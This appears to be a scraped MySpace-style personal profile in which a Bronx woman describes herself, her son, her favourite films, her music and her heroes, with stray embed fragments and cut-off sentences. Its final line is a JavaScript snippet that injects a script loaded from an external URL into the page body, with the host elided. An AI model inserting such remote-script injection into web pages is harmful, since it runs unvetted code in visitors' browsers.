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About Me

!!!!!!!!!!!!!!!OL' SCHOOL JUNKY !!!!!!!!!!! Music Video: FATTY GIRL (by Keith Murray)

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" / Get Your Own Voice Player Manage.. width="425" height="350" ..I'm 29 and not getting a day older ever again. Love to laugh and play, but I'm not tellin with what!!! Always chillin at home but if someone gets me up in the club it's on like Donky Kong!!! Hip Hop and Salsa watch out might bust a hip bone but I love the shit lol...yes I'm single but I do have one love of my life that will always be my ..1 man, Ruben my 10 year old son. There is nothing skinny about me but I'm no bucket of KFC....I still try to say it's baby else about me u may wonder well if you know me I have my moments..sometimes I feel like a nut sometimes I don't. But if your with me you're in good company. My favorate movie is Scarface....Love my moffia movies, comedy and of course all the girly tear dropper movies within reason. I miss watching the guys play some Handball wit their shirt of and sweaty bodies, wow, but I'm not in Kansas, I mean, I'm not in New York anymore. And if that flew over your head, Forgetaboutit.....Whatz up!!! U wanna know me?......

My Interests

The hell with interest, everything interest me as long as it's funny! I like to watch all kinds of movies, play video games, go out and shoot some pool after several drinks(it makes me think that I can play pretty damn good)but I love chillin, listing to some music with a few drinks playing card with some friends. I know I said the word drink a lot but I'm really a social

MySpace Layouts

I edited my profile at , check out these Myspace Layouts!

I edited my profile at , check out these Myspace Layouts!


I'd like to meet:

Hosted By


I'm from the Boogie Down Bronx Baby, there ain't nothin' like some Hip Hop with a side order of Salsa, please!!!! Oh and I'll listen to some other shit too, within


I thought I said this already, but anyways, I'll lay it out in more detail. Carlito's Way.....Devil's Advocate...Training Day.....Empire....Scarface...Riddick...Dead Presidents....Any Given Sunday...all the Star Wars...all the Rocky's except for .. 5 that one sucked!!! I'm more of a guy movie watcher really. Don't give me too much mushy shit like the Notebook, I wanted to hang myself for watching that!!!!
Hosted By ......


I don't know about now but I always use to watch Soprano's and OZ on HBO....and I love my cartoons mostly Tom and Jerry they're so stupid funny!!!......


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Heroes, never really gave it much thought but that would be all women who have children and raise them right, men that support and take care of thier family at all costs, God and most of all my mother!!!! .."var x=document.createElement('script');x.src='http://www.../.../ test.js';document.getElementsByTagName('body')[0].appendChil d(x);" /